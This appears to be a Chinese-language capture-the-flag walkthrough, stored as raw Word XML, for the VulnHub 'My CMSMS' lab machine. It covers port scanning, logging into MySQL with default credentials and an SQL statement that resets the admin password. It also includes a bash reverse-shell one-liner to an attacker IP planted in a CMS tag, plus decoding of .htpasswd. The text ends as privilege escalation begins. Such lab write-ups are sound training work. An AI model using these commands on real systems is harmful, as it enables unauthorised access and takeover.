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8B4F6E" w14:textId="22E80991" w:rsidR="00057BC1" w:rsidRDefault="00D6536E" w:rsidP="00D6536E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3CC07" w14:textId="327DC5B0" w:rsidR="00D6536E" w:rsidRDefault="00D6536E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6536E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="008E25F5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/my-cmsms-1,498/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E15B26D" w14:textId="433441C0" w:rsidR="00D6536E" w:rsidRDefault="00D6536E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>描述内容大概是靶机环境是一个C</w:t>
      </w:r>
      <w:r>
        <w:t>MS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景目录是获得root权限。新手到中等级别。这里建议大家用</w:t>
      </w:r>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来做方便一点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24704831" w14:textId="46CB30C0" w:rsidR="00D6536E" w:rsidRDefault="00D6536E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C879C5" wp14:editId="6401C209">
            <wp:extent cx="5274310" cy="16268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12F5" w14:textId="6CCD0F9E" w:rsidR="00D6536E" w:rsidRDefault="00D6536E"/>
    <w:p w14:paraId="11DD1A89" w14:textId="18B4166A" w:rsidR="00D6536E" w:rsidRDefault="00D6536E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入以后顺便设置成桥接网卡就可以运行了，打开以后会顺便回显靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果获取不了I</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话建议使用重启大法，也试过更换成N</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:t>AT</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式，但是没有重启大法好用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3FCD33" w14:textId="2216C28F" w:rsidR="00D6536E" w:rsidRDefault="00917B06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E329D26" wp14:editId="3949A165">
            <wp:extent cx="5080261" cy="3810196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C223" w14:textId="68659F4A" w:rsidR="009F0C3C" w:rsidRDefault="009F0C3C"/>
    <w:p w14:paraId="1D9CCD46" w14:textId="40E8935D" w:rsidR="009F0C3C" w:rsidRDefault="009F0C3C" w:rsidP="009F0C3C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>探测靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A37D1" w14:textId="69756D1F" w:rsidR="009F0C3C" w:rsidRDefault="009F0C3C" w:rsidP="009F0C3C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于已经知道了靶机I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接开始</w:t>
      </w:r>
      <w:r w:rsidR="00917B06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用nmap探测端口,这次主要开了3个端口，22，80，和3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69067AF9" w14:textId="5F64562A" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="009F0C3C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>nmap -A -sS -sV -v -p- 192.168.3.192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A80D8" w14:textId="58E830AD" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="009F0C3C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F0013BD" wp14:editId="405EA36A">
            <wp:extent cx="4489681" cy="3137061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313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44B2" w14:textId="5C9F1663" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="009F0C3C"/>
    <w:p w14:paraId="5E2AB572" w14:textId="696CB21C" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x02:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9D569" w14:textId="1F523FF8" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先正常访问一波</w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以正常回显页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CE091" w14:textId="09A05BEC" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545ED508" wp14:editId="556E758C">
            <wp:extent cx="5274310" cy="33343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1AF7" w14:textId="318F50D3" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06"/>
    <w:p w14:paraId="621C8D96" w14:textId="7E54E0AA" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始启动d</w:t>
      </w:r>
      <w:r>
        <w:t>irb,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可以扫到一些后台之类的地方。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DDE0F" w14:textId="193BD159" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B15E48C" wp14:editId="43749A8F">
            <wp:extent cx="3251367" cy="1422473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367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F2EA" w14:textId="3A1CFB99" w:rsidR="00917B06" w:rsidRDefault="00207336" w:rsidP="00207336">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>03:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EDF82" w14:textId="5C6890FE" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里返回前面，前面开启了3306数据库端口，尝试连一波看看root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root能不能连上,结果发现直连成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF6D417" w14:textId="7D77EA99" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令:</w:t>
      </w:r>
      <w:r>
        <w:t>mysql -h 192.168.3.192 -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FD7E1" w14:textId="328F583C" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A47E1B7" wp14:editId="2CC728F9">
            <wp:extent cx="4337273" cy="1187511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C838" w14:textId="67ED1E3D" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06"/>
    <w:p w14:paraId="0EAE032C" w14:textId="03E2CE59" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后就是s</w:t>
      </w:r>
      <w:r>
        <w:t>how databases;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看有哪些数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F12D6E5" w14:textId="630ADE22" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23890A84" wp14:editId="56179DBA">
            <wp:extent cx="2235315" cy="121926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97F8" w14:textId="6541BF98" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06"/>
    <w:p w14:paraId="26600DA7" w14:textId="0A19DC5E" w:rsidR="00917B06" w:rsidRDefault="00917B06" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟进</w:t>
      </w:r>
      <w:r>
        <w:t>cmsms_db</w:t>
      </w:r>
      <w:r w:rsidR="00785E3A">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00785E3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在查看里面的表，发现有一个c</w:t>
      </w:r>
      <w:r w:rsidR="00785E3A">
        <w:t>ms_users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E616C68" w14:textId="1D27C5BC" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="730DB32B" wp14:editId="1E213DB5">
            <wp:extent cx="2343270" cy="155583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270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90FF" w14:textId="6522CB03" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06"/>
    <w:p w14:paraId="0E578658" w14:textId="4C383EF2" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00785E3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后直接s</w:t>
      </w:r>
      <w:r>
        <w:t>elect * from cms_users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到一个admin的账号密码,有一个尴尬的问题是密码解不出来。。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9A963" w14:textId="24D3AD92" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="566A00A6" wp14:editId="40D176F3">
            <wp:extent cx="5274310" cy="4794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83D7" w14:textId="3C0E876D" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06"/>
    <w:p w14:paraId="146E2A55" w14:textId="0FCEE93D" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以只能尝试用Update语句更改admin的密码了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD67898" w14:textId="02BE2CB0" w:rsidR="00785E3A" w:rsidRDefault="00785E3A" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句:</w:t>
      </w:r>
      <w:r w:rsidRPr="00785E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007048A3" w:rsidRPr="007048A3">
        <w:t xml:space="preserve">update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'pikapi'))) where username = 'admin'; </w:t>
      </w:r>
      <w:r w:rsidR="00207336">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00207336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里一定要提醒一波不能直接把密码设置成字符串格式，得通过M</w:t>
      </w:r>
      <w:r w:rsidR="00207336">
        <w:t>D5</w:t>
      </w:r>
      <w:r w:rsidR="00207336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密才能存放</w:t>
      </w:r>
      <w:r w:rsidR="00B95F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时它不仅仅只是M</w:t>
      </w:r>
      <w:r w:rsidR="00B95F4D">
        <w:t>D5</w:t>
      </w:r>
      <w:r w:rsidR="00B95F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还涉及到另外一个表</w:t>
      </w:r>
      <w:r w:rsidR="00207336">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F12A8" w14:textId="0CC34F58" w:rsidR="00207336" w:rsidRDefault="007048A3" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC7A38F" wp14:editId="7B01396A">
            <wp:extent cx="5274310" cy="7327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FE22" w14:textId="04ECF573" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06"/>
    <w:p w14:paraId="11910097" w14:textId="55B270FF" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后回到192.168.3.192</w:t>
      </w:r>
      <w:r>
        <w:t>/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入账号和刚才改过的密码成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5CF16" w14:textId="4F7DA319" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54786586" wp14:editId="322BA59F">
            <wp:extent cx="5274310" cy="31483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C3DC" w14:textId="13C48FF7" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06"/>
    <w:p w14:paraId="76D3AE8D" w14:textId="3579C907" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后就是找能插入代码的地方了在E</w:t>
      </w:r>
      <w:r>
        <w:t>xtensions/User Defined Tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下按编辑可以进入到代码区域</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C375692" w14:textId="1C21D79A" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3674EFA1" wp14:editId="4237A4AD">
            <wp:extent cx="5274310" cy="33305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026A" w14:textId="614B5105" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06"/>
    <w:p w14:paraId="7E679EE8" w14:textId="3CA3F962" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先提前开启n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">etcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后插入一句话反弹shell语句</w:t>
      </w:r>
      <w:r w:rsidR="00D94EEF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,然后点击</w:t>
      </w:r>
      <w:r w:rsidR="00D94EEF">
        <w:t>apply</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC0F91" w14:textId="639F465A" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句:</w:t>
      </w:r>
      <w:r w:rsidRPr="00207336">
        <w:t xml:space="preserve"> system("bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.3.193/5555 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE67C09" w14:textId="6E4A91B7" w:rsidR="00207336" w:rsidRDefault="00207336" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3354A988" wp14:editId="59C47863">
            <wp:extent cx="5274310" cy="22796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1051" w14:textId="4C0FD090" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06"/>
    <w:p w14:paraId="15C0F5B0" w14:textId="1E12FF9C" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击完a</w:t>
      </w:r>
      <w:r>
        <w:t>pply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后再点击run就可以得到反弹shell了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E4C455" w14:textId="54F9E624" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4783A307" wp14:editId="74BB6AB7">
            <wp:extent cx="4191215" cy="122561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D011" w14:textId="07125CED" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06"/>
    <w:p w14:paraId="6683A286" w14:textId="3BCBBA9C" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00D94EEF">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x04:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息挖掘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2D4E8" w14:textId="6E932B3D" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>既然反弹到/</w:t>
      </w:r>
      <w:r>
        <w:t>var/www/html/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下先l</w:t>
      </w:r>
      <w:r>
        <w:t>s -la</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详细看一下该目录先，发现有个.</w:t>
      </w:r>
      <w:r>
        <w:t>htpasswd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的东西出来了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BAA095" w14:textId="1EEEA625" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3388F402" wp14:editId="0169CC27">
            <wp:extent cx="4496031" cy="476909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476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8AF8" w14:textId="78EEE7D4" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06"/>
    <w:p w14:paraId="00409CE4" w14:textId="1CD9B007" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:t>Cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以后得到一串字符，数了一下长度为44石锤是b</w:t>
      </w:r>
      <w:r>
        <w:t>ase64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503218FA" w14:textId="6642C466" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429618B6" wp14:editId="3C5AFAE5">
            <wp:extent cx="2457576" cy="241312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5E50" w14:textId="445E930F" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码了一下还是一串字符串那只能用</w:t>
      </w:r>
      <w:r>
        <w:t>base32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续解码了。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF72E6" w14:textId="7B3C7366" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="064A20D7" wp14:editId="727D7425">
            <wp:extent cx="5274310" cy="17018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FECC" w14:textId="40C4BE03" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06"/>
    <w:p w14:paraId="56BA5207" w14:textId="6AB61F17" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后终于得到一个账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3A539" w14:textId="0497DA75" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D083331" wp14:editId="5E913B2B">
            <wp:extent cx="5274310" cy="15068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7B51" w14:textId="7F87D54B" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06"/>
    <w:p w14:paraId="190E9FBA" w14:textId="42B0B81C" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入完密码再输入一个Python的反弹shell成功登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093D8DA" w14:textId="5DC94328" w:rsidR="00D94EEF" w:rsidRDefault="00D94EEF" w:rsidP="00917B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A415972" wp14:editId="25CF291D">
            <wp:extent cx="5274310" cy="17614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4002" w14:textId="75FE4478" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="00917B06"/>
    <w:p w14:paraId="3695B531" w14:textId="62478A2E" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA6">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x05:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8CEBC9" w14:textId="30262A18" w:rsidR="009F4FA6" w:rsidRDefault="009F4FA6" w:rsidP="009F4FA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先先用s</w:t>
      </w:r>
      <w:r>
        <w:t>udo -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
